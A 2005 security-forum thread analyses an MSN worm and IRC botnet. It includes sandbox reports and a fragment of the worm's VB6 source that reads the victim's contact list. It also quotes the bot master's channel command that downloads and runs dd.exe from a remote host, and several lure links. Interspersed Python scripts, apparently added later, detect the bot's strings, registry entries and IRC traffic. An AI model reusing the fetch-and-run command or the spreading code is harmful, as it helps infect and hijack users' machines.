New MSN Virus
ash^
Got a msg from a mate on MSN earlier today. It's a new MSN worm like that other one; it's the same person as well who's coded it.

QUOTE
Ben says:
ur profile is under chatpr?
Ben says:
http://chatpr.org/msn.php?email=EMAILHERE@hotmail.com


I've downloaded the file, renamed it to a .exe and used PEiD to find out what it was packed/crypted with: it's been encrypted with Morphine then packed with UPX. So I pulled out some magic tools and dumped the original file. I've pulled the IRC info from it, here it is.

QUOTE
[Tg]
test
great.teh-cia.us : 8080
##test
testing123
great.teh-cia.us : 8080
#lagged
test
wucualt.exe
System Services
msconfig.dat
##test


This is my first thread, so if it's in the wrong section I'm sorry. I've attached the original file; the .rar password is test. DON'T open the .exe.

-Ash
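One way to automate the last step of that post, pulling the IRC configuration out of the unpacked dump, as an added example that is not the poster's tooling: extract the printable strings and sort them by shape (host:port pairs, channels, URLs, dropped filenames, autorun registry paths). SAMPLE_DUMP is constructed to mimic the config block quoted above; the regexes, category names and the inclusion of kernel32.dll are my own, not something the dump is known to contain.

```python
"""
String triage of an unpacked bot dump: pick the IRC C2 configuration
(server, port, channels, dropped filenames, autorun paths) out of the
printable strings. Added example; not the poster's tooling. The blob
below is constructed to resemble the config block quoted in the post.
"""
import re
from dataclasses import dataclass, field

# Constructed stand-in for the dumped executable (UPX and Morphine removed).
SAMPLE_DUMP = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00\x00\x00"
    b"[Tg]\x00test\x00great.teh-cia.us : 8080\x00##test\x00testing123\x00"
    b"great.teh-cia.us : 8080\x00#lagged\x00test\x00wucualt.exe\x00"
    b"System Services\x00msconfig.dat\x00##test\x00"
    b"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\x00"
    b"http://chatpr.org/msn.php?email=\x00kernel32.dll\x00"
)

HOST_PORT_RE = re.compile(r"^([a-z0-9][a-z0-9.-]*\.[a-z]{2,})\s*:\s*(\d{1,5})$", re.I)
URL_RE = re.compile(r"^https?://\S+$", re.I)
CHANNEL_RE = re.compile(r"^#{1,2}[^\s,]{1,49}$")
FILE_RE = re.compile(r"^[\w.-]+\.(?:exe|dll|dat|vxd|pif|scr)$", re.I)
# Registry paths this family writes its autorun value into (see the sandbox reports further down).
AUTORUN_RE = re.compile(r"\\(?:CurrentVersion\\Run(?:Services)?|Control\\Lsa|Microsoft\\OLE)$", re.I)


@dataclass
class BotConfig:
    servers: list = field(default_factory=list)       # (host, port)
    channels: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    files: list = field(default_factory=list)
    autorun_keys: list = field(default_factory=list)
    other: list = field(default_factory=list)         # nick prefix, password, key, value name candidates


def extract_strings(blob: bytes, min_len: int = 4) -> list:
    """ASCII runs of at least min_len printable characters, like strings(1)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]


def _add(lst: list, item) -> None:
    if item not in lst:
        lst.append(item)


def triage(blob: bytes) -> BotConfig:
    cfg = BotConfig()
    for s in extract_strings(blob):
        s = s.strip()
        m = HOST_PORT_RE.match(s)
        if m:
            _add(cfg.servers, (m.group(1).lower(), int(m.group(2))))
        elif URL_RE.match(s):
            _add(cfg.urls, s)
        elif CHANNEL_RE.match(s):
            _add(cfg.channels, s)
        elif FILE_RE.match(s):
            _add(cfg.files, s.lower())
        elif AUTORUN_RE.search(s):
            _add(cfg.autorun_keys, s)
        elif len(s) <= 20:
            # short leftovers next to the config block: nick prefix, password, channel key, value name
            _add(cfg.other, s)
    return cfg


def report(cfg: BotConfig) -> str:
    return "\n".join([
        "IRC servers : " + ", ".join(f"{h}:{p}" for h, p in cfg.servers),
        "channels    : " + ", ".join(cfg.channels),
        "URLs        : " + ", ".join(cfg.urls),
        "files       : " + ", ".join(cfg.files),
        "autorun keys: " + ", ".join(cfg.autorun_keys),
        "other tokens: " + ", ".join(cfg.other),
    ])


if __name__ == "__main__":
    print(report(triage(SAMPLE_DUMP)))
```

Run `triage(open(path, "rb").read())` on the dump, not on the packed sample: a plain UPX layer comes off with `upx -d`, and the Morphine layer was handled by dumping the running image, as the post describes. Everything the script does not recognise lands in `other`, which is where the nick prefix, the server password and the channel key end up; a human still has to match those to the server entries.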
buzzons
Seems you wanted that one, huh.

Good work mate, now to go and educate the masses not to click this link. I wish MS would make a script thing to stop external programs pasting into the conversation. Would stop a lot of this happening.
aelphaeis_mangarae
QUOTE
[Tg]
test
great.teh-cia.us : 8080
##test
testing123
great.teh-cia.us : 8080
#lagged
test
wucualt.exe
System Services
msconfig.dat
##test


I assume it's giving you some sort of false DNS. Get a decent packet sniffer and track it to the IRC channel. I myself have managed to obtain lots of these bots (they were mostly Rbot, RxBot) and I tracked down the bot masters.
nuorder
Yes, looks like the same one.

Oh well, another virus/botnet to mess with.
SkullSplitter
It looks like Kelvir.

CODE

' Fragment of the worm's VB6 source (Form_Load), as posted.
Private Sub Form_Load()
On Error Resume Next
' Path of the running executable; SaveAppToWin_ini records it in win.ini for autostart
strOldFile = App.Path & "\" & App.EXEName & ".exe"
SaveAppToWin_ini strOldFile

MSNrwnt = "CALL IT MSN.RWNT K THX :) Greetz to Bottalk"
readDoneAddys   ' presumably loads the list of addresses already messaged
MouseFreeze

' Link sent to each contact; the contact's address is appended after "email="
Link1 = "http://www.fuckit.com/pictures.php?email="

On Error Resume Next
' Messenger type library: enumerate the logged-in user's contact list
Set objmessenger = New MessengerAPI.Messenger
Set Contacts = objmessenger.MyContacts
' (posted fragment ends here)
End Sub


cvh
Norman Scanner Engine 5.82. 1
Sandbox 05.82, dated 27/04-2005

Your message ID (for later reference): 20050531-316

dump.exe : [SANDBOX] contains a security risk - W32/Malware (Signature:
NO_VIRUS)
[ General information ]
* **IMPORTANT: PLEASE SEND THE SCANNED FILE TO: ANALYSIS@NORMAN.NO -
REMEMBER TO ENCRYPT IT (E.G. ZIP WITH PASSWORD)**.
* **Locates window "NULL [class mIRC]" on desktop.
* File length: 720896 bytes.

[ Changes to filesystem ]
* Creates file C:\WINDOWS\SYSTEM\xagwxzy.exe.
* Deletes file 1.

[ Changes to registry ]
* Creates value "System Services"="xagwxzy.exe" in key
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run".
* Creates value "System Services"="xagwxzy.exe" in key
"HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices".
* Creates key "HKLM\Software\Microsoft\OLE".
* Sets value "System Services"="xagwxzy.exe" in key
"HKLM\Software\Microsoft\OLE".
* Sets value "System Services"="xagwxzy.exe" in key
"HKLM\System\CurrentControlSet\Control\Lsa".
* Creates value "System Services"="xagwxzy.exe" in key
"HKCU\Software\Microsoft\Windows\CurrentVersion\Run".
* Creates key "HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices".
* Sets value "System Services"="xagwxzy.exe" in key
"HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices".
* Creates key "HKCU\Software\Microsoft\OLE".
* Sets value "System Services"="xagwxzy.exe" in key
"HKCU\Software\Microsoft\OLE".
* Creates key "HKCU\Software\SYSTEM\CurrentControlSet\Control\Lsa".
* Sets value "System Services"="xagwxzy.exe" in key
"HKCU\Software\SYSTEM\CurrentControlSet\Control\Lsa".

[ Network services ]
* Connects to "great.teh-cia.us" on port 57 (TCP).
* Connects to IRC Server.

[ Security issues ]
* Possible backdoor functionality [Authenticate] port 113.

[ Process/window information ]
* Creates a mutex LIQUID.
* Will automatically restart after boot (I'll be back...).


© 2004 Norman ASA. All Rights Reserved.
The material presented is distributed by Norman ASA as an information source
only.

Received 31.May 2005 at 13.31 - processed 31.May 2005 at 13.32.
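The persistence entries in that report are what to look for on a suspect machine. The Python below is added here and is not part of the thread or of Norman's tooling: it parses a .reg export and flags the pattern the report shows, an executable written as a bare filename, copied into several keys, including keys (OLE, Lsa) that Windows never consults for autorun. SAMPLE_REG is a constructed export reproducing the report's entries next to a normal ctfmon.exe value and the Media Access value from the second report; the key lists and the three heuristics are my assumptions, not something the thread states.

```python
"""
Audit a registry export (.reg) for the autorun pattern in the sandbox report:
the same "System Services"="xagwxzy.exe" value written to Run, RunServices and
to keys that are not autorun locations at all (OLE, Lsa). Added example, not
part of the thread; SAMPLE_REG is a constructed export.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

HIVES = {"HKEY_LOCAL_MACHINE": "HKLM", "HKEY_CURRENT_USER": "HKCU",
         "HKEY_USERS": "HKU", "HKEY_CLASSES_ROOT": "HKCR"}

AUTORUN_KEYS = {
    r"software\microsoft\windows\currentversion\run",
    r"software\microsoft\windows\currentversion\runonce",
    r"software\microsoft\windows\currentversion\runservices",
}
# Not autorun locations; an executable name stored here is a family marker, not persistence.
ODD_KEYS = {
    r"software\microsoft\ole",
    r"system\currentcontrolset\control\lsa",
    r"software\system\currentcontrolset\control\lsa",
}

SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"System Services"="xagwxzy.exe"
"Media Access"="C:\\Program Files\\Media Access\\MediaAccK.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"System Services"="xagwxzy.exe"

[HKEY_LOCAL_MACHINE\Software\Microsoft\OLE]
"System Services"="xagwxzy.exe"

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa]
"restrictanonymous"=dword:00000000
"System Services"="xagwxzy.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"System Services"="xagwxzy.exe"
'''

VALUE_RE = re.compile(r'^(@|"((?:[^"\\]|\\.)*)")=(.*)$')
EXE_RE = re.compile(r"\.(?:exe|com|bat|pif|scr|dll)\b", re.I)


@dataclass
class Finding:
    key: str
    name: str
    data: str
    reasons: list


def parse_reg(text: str) -> dict:
    """Map (hive, subkey) -> {value name: string data}; non-string types are skipped."""
    values = defaultdict(dict)
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            hive, _, sub = line[1:-1].partition("\\")
            current = (HIVES.get(hive, hive), sub)
            continue
        m = VALUE_RE.match(line)
        if not m or current is None:
            continue
        data = m.group(3)
        if not (len(data) >= 2 and data.startswith('"') and data.endswith('"')):
            continue  # dword:/hex: values are not launch strings
        name = "(Default)" if m.group(1) == "@" else m.group(2)
        # .reg escaping: \\ is a backslash, \" is a quote
        values[current][name] = data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return values


def audit(values: dict) -> list:
    copies = defaultdict(list)  # (name, data) -> keys holding that exact value
    for key, vals in values.items():
        for name, data in vals.items():
            copies[(name.lower(), data.lower())].append(key)

    findings = []
    for (hive, sub), vals in values.items():
        sub_l = sub.lower()
        autorun, odd = sub_l in AUTORUN_KEYS, sub_l in ODD_KEYS
        if not (autorun or odd):
            continue
        for name, data in vals.items():
            if not EXE_RE.search(data):
                continue
            reasons = []
            if odd:
                reasons.append("executable name stored in a non-autorun key")
            if autorun and not re.match(r'^"?[A-Za-z]:\\', data):
                reasons.append("bare filename, located via the search path rather than a full path")
            n = len(copies[(name.lower(), data.lower())])
            if n > 1:
                reasons.append(f"identical value present in {n} keys")
            if reasons:
                findings.append(Finding(f"{hive}\\{sub}", name, data, reasons))
    return findings


if __name__ == "__main__":
    for f in audit(parse_reg(SAMPLE_REG)):
        print(f"{f.key}\\{f.name} = {f.data}\n    " + "\n    ".join(f.reasons))
```

Feed it a real export made with `reg export "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" run.reg` (one export per key of interest; reg.exe writes UTF-16, so open the file with `encoding="utf-16"`). The limit is visible in the sample: the Media Access entry from the dd.exe report has a full path and lives in one key only, so it passes these heuristics and needs a hash or signature match instead.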
cvh
And in the channel ##test, the topic contained a link for the bots (?download http://67.159.26.109/~tehcia/dd.exe C:\dd.exe 1 -s).


Norman Scanner Engine 5.82. 1
Sandbox 05.82, dated 27/04-2005

Your message ID (for later reference): 20050531-011

dd.exe : Not detected by sandbox (Signature: W32/WinAd.AJ)
[ General information ]
* Accesses executable file from resource section.
* Creating several executable files on hard-drive.
* File length: 163961 bytes.

[ Changes to filesystem ]
* Creates directory C:\Program Files\Media Access.
* Creates file C:\Program Files\Media Access\MediaAccC.dll.
* Creates file C:\Program Files\Media Access\MediaAccK.exe.
* Creates file C:\Program Files\Media Access\Info.txt.
* Creates file C:\WINDOWS\SYSTEM\ide21201.vxd.

[ Changes to registry ]
* Creates key "HKLM\Software\Media Access".
* Sets value
"param"="3baf8b1054d0015e8a49b821df2fa3ffe78a3b7aa704cbe1:31303138346238306266626631
66616331356164666535613064363264373962:other::win98:exe"
in key "HKLM\Software\Media Access".
* Sets value "track"="1" in key "HKLM\Software\Media Access".
* Deletes value "Updating" in key "HKLM\Software\Media Access".
* Creates value "Media Access"="C:\ProgramFiles\MediaAccess\MediaAccK.exe"
in key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run".

[ Process/window information ]
* Attempts to NULL C:\Program Files\Media Access\MediaAccess.exe NULL.
* Creates a mutex MediaAccess.
* Will automatically restart after boot (I'll be back...).
* Creates an event called Registry event.
* Enumerates running processes.
* Enumerates running processes several parses....


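aelphaeis_mangarae's advice above is to find the C2 channel on the wire, and cvh's post shows what is waiting in it: a ?download command in the ##test topic. The two analyses also disagree on the port (8080 in the dumped config, 57 in the sandbox trace), so the detector below, an added example that is not from the thread, keys on the IRC protocol itself rather than on the port, and parses the download command out of the topic. The flows are constructed: 198.51.100.7 is a documentation address standing in for great.teh-cia.us, the nick suffix is made up, and the meaning of the "1 -s" arguments after the destination path is an assumption (the thread shows the command, not its syntax).

```python
"""
Spot an IRC bot session in captured TCP payloads regardless of port, and pull
the bot master's download command out of the channel topic. Added example,
not from the thread; SAMPLE_FLOWS is constructed.
"""
import re
from dataclasses import dataclass, field

IRC_COMMANDS = {"PASS", "NICK", "USER", "JOIN", "PART", "PRIVMSG", "NOTICE",
                "PING", "PONG", "TOPIC", "MODE", "QUIT"}
STANDARD_IRC_PORTS = set(range(6660, 6670)) | {6697, 7000}

# Constructed captures: one conversation per (client, server, port), payloads in
# both directions, plus an ordinary HTTP request on the same port as a control.
SAMPLE_FLOWS = [
    {"client": "10.0.0.5", "server": "198.51.100.7", "port": 8080, "dir": "c2s",
     "payload": b"NICK [Tg]-8831\r\nUSER test 0 0 :test\r\n"},
    {"client": "10.0.0.5", "server": "198.51.100.7", "port": 8080, "dir": "s2c",
     "payload": b":great.teh-cia.us 001 [Tg]-8831 :Welcome\r\n"},
    {"client": "10.0.0.5", "server": "198.51.100.7", "port": 8080, "dir": "c2s",
     "payload": b"JOIN ##test testing123\r\n"},
    {"client": "10.0.0.5", "server": "198.51.100.7", "port": 8080, "dir": "s2c",
     "payload": b":great.teh-cia.us 332 [Tg]-8831 ##test :?download "
                b"http://67.159.26.109/~tehcia/dd.exe C:\\dd.exe 1 -s\r\n"},
    {"client": "10.0.0.5", "server": "198.51.100.9", "port": 8080, "dir": "c2s",
     "payload": b"GET /index.html HTTP/1.1\r\nHost: 198.51.100.9\r\n\r\n"},
]


@dataclass
class Session:
    client: str
    server: str
    port: int
    irc_lines: int = 0
    nick: str = None
    channels: list = field(default_factory=list)    # (channel, key)
    downloads: list = field(default_factory=list)   # parsed ?download commands
    indicators: list = field(default_factory=list)


def parse_irc_line(line: str):
    """Split '[:prefix] COMMAND params [:trailing]' into parts; None for an empty line."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, _, trailing = line.partition(" :")
    parts = head.split()
    if not parts:
        return None
    args = parts[1:] + ([trailing] if trailing else [])
    return {"prefix": prefix, "cmd": parts[0].upper(), "args": args}


def parse_bot_command(text: str):
    """'?download <url> <dest> [run] [flags...]' as seen in the ##test topic.
    Meanings of the fields after <dest> are assumed, not documented in the thread."""
    tok = text.split()
    if len(tok) < 3 or tok[0].lower() != "?download":
        return None
    return {"url": tok[1], "dest": tok[2],
            "run": tok[3] == "1" if len(tok) > 3 else None, "flags": tok[4:]}


def analyze(flows) -> list:
    sessions = {}
    for f in flows:
        key = (f["client"], f["server"], f["port"])
        s = sessions.setdefault(key, Session(*key))
        for raw in re.split(r"\r?\n", f["payload"].decode("latin-1")):
            msg = parse_irc_line(raw)
            if msg is None:
                continue
            cmd, args = msg["cmd"], msg["args"]
            if cmd not in IRC_COMMANDS and not (cmd.isdigit() and len(cmd) == 3):
                continue  # not an IRC command or numeric reply
            s.irc_lines += 1
            if cmd == "NICK" and args:
                s.nick = args[0]
            elif cmd == "JOIN" and args:
                s.channels.append((args[0], args[1] if len(args) > 1 else None))
            elif cmd in ("332", "TOPIC", "PRIVMSG") and args:
                dl = parse_bot_command(args[-1])
                if dl:
                    s.downloads.append(dl)

    alerts = []
    for s in sessions.values():
        if s.irc_lines < 2:
            continue
        if s.port not in STANDARD_IRC_PORTS:
            s.indicators.append(f"IRC on non-standard port {s.port}")
        for chan, chankey in s.channels:
            if chankey:
                s.indicators.append(f"join to keyed channel {chan}")
        if s.downloads:
            s.indicators.append("download command delivered via channel topic/message")
        alerts.append(s)
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_FLOWS):
        print(f"{a.client} -> {a.server}:{a.port} nick={a.nick} channels={a.channels}")
        for i in a.indicators:
            print("  -", i)
        for d in a.downloads:
            print("  payload:", d["url"], "->", d["dest"])
```

The per-session record gives the analyst the same things ash^ pulled out of the binary statically (server, channel, key, nick prefix) plus what the static dump cannot show: the URL the master is currently pushing. A real capture needs TCP reassembly before the line split; the sample hands the detector whole lines.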
ash^
cvh: Can you post the link to that sandbox, to help me and other users get info on dodgy files?

The owner of the botnet is making the bots download dd.exe, and he gets paid for installing the malware/spyware on the computers.
sabrodiesel2000
QUOTE(ash^ @ May 30 2005, 04:04 PM)
Got a msg from a mate on MSN earlier today. It's a new MSN worm like that other one; it's the same person as well who's coded it.
[...]

Yes Ash, this silly thing has been out for the past 2 weeks I believe... and good work there, keep it up...
cvh
Here you go: http://sandbox.norman.no/live_4.html , it was posted in some earlier thread.
ash^
QUOTE(sabrodiesel2000 @ May 31 2005, 08:31 AM)
Yes Ash, this silly thing has been out for the past 2 weeks I believe... and good work there, keep it up...

Has it? Ooh, I didn't see anyone post anything, so I thought I would.

And thanks cvh for the link. I haven't been on the forums for a few days and didn't notice the link, cheers.

spook
QUOTE(Msn-virus)
check hxxp://www.genkids.com/GenKids/PhotoAlbum/Pictures/beach_pictures_packed.PIF :D:D !!!

Be careful!

Another one. No use in making a new topic since I didn't look up any info or analyze it.



Invision Power Board © 2001-2005 Invision Power Services, Inc.